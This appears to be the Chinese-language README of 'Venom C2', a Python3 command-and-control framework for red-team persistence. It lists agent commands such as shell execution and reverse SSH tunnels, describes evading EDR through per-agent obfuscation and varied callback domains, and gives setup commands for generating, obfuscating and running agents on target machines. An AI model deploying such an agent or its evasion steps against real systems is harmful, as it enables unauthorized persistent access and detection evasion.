
Venom C2 是一个无依赖的 Python3 命令与控制框架,专为红队持久化设计,无需安装额外包即可在系统上运行。它包含一个 Flask 团队服务器、一个 Electron 操作员图形界面,以及一个通过可配置 AES 加密 JSON 消息在 HTTP/HTTPS 上进行通信的单文件 Python 代理。你可以用它执行命令、管理文件、维持访问权限,以及从受控系统创建 SSH 反向隧道。
在网络权限提升过程中,我们接触了许多运行着奇异发行版和架构的生产系统。我们试图建立持久化控制,但手头的工具和技术都不奏效。此外,部分目标系统运行着 EDR。
这些都是生产环境,因此我们不想安装任何包。我们需要一个无需依赖即可运行的 C2 代理。这些系统上安装了 Python3,于是我就在渗透过程中创建了 Venom C2——一个无依赖、即插即用的 Python3 C2 代理。
我们不愿使用现成的 C2 代理,因为担心它们可能被蓝队检测到。 独特的代码是绕过现代 EDR 的关键
由于系统数量众多,我们为每个代理自动生成了独特的混淆、命名、文件系统路径、不同的网络回调域名以及独特的网络路径请求。

我把它命名为 Venom,因为我儿子喜欢蜘蛛侠中的毒液反派。另外,Python 是一种蛇,而酷蛇都有毒液,所以感觉这个名字很合适。
没有未来。
这只是一个我在渗透过程中临时开发的 C2 项目。我花了大约两天时间让它变得稳定可靠,能够在目标环境中工作。它完成了任务,在剩下的六周渗透中为我们提供了网络持久化。我不打算继续开发或使用这个项目,所以我认为它适合公开发布。
否则它将只能消失在 devNULL...


[11-04-2025 11:31 AM MST] admin help
help : Display this help menu
ls : List directory contents
pwd : Show current working directory
cd : Change directory
cat : Display file contents
mv : Move/rename files or directories
cp : Copy files or directories
mkdir : Create directory
rmdir : Remove empty directory
write : Write content to file
chmod : Change file permissions
rm : Remove (delete) files
shell : Execute raw shell command
sleep : Make agent sleep with optional jitter
sshrev : Create reverse SSH tunnel
kill : Terminate agent process
upload : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box
git clone https://github.com/boku7/venom
cd venom
pip3 install -r server/requirements.txt
cd server
python3 server.py --help
python3 server.py
python3 server.py --adduser <USERNAME> <PASSWORD>在工作站(而非服务器)上运行客户端 UI。它必须能够连接到服务器。
cd ../client
npm install
npm run start
打开客户端,进入 Config 并输入服务器凭据。
服务器的客户端 API 基础路径为 /api/。请勿将 /api/ 暴露到公共互联网。应使用 VPN 或严格的防火墙/反向代理规则,确保只有受信任的客户端可以访问。
在 server 目录下执行:
python3 agent_create.py -H <server_host> -P <server_port> [-http]
在 server 目录下执行:
python3 agent_obfuscate.py agents/<generated_agent_file>.py
在目标计算机上运行,以执行控制。
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py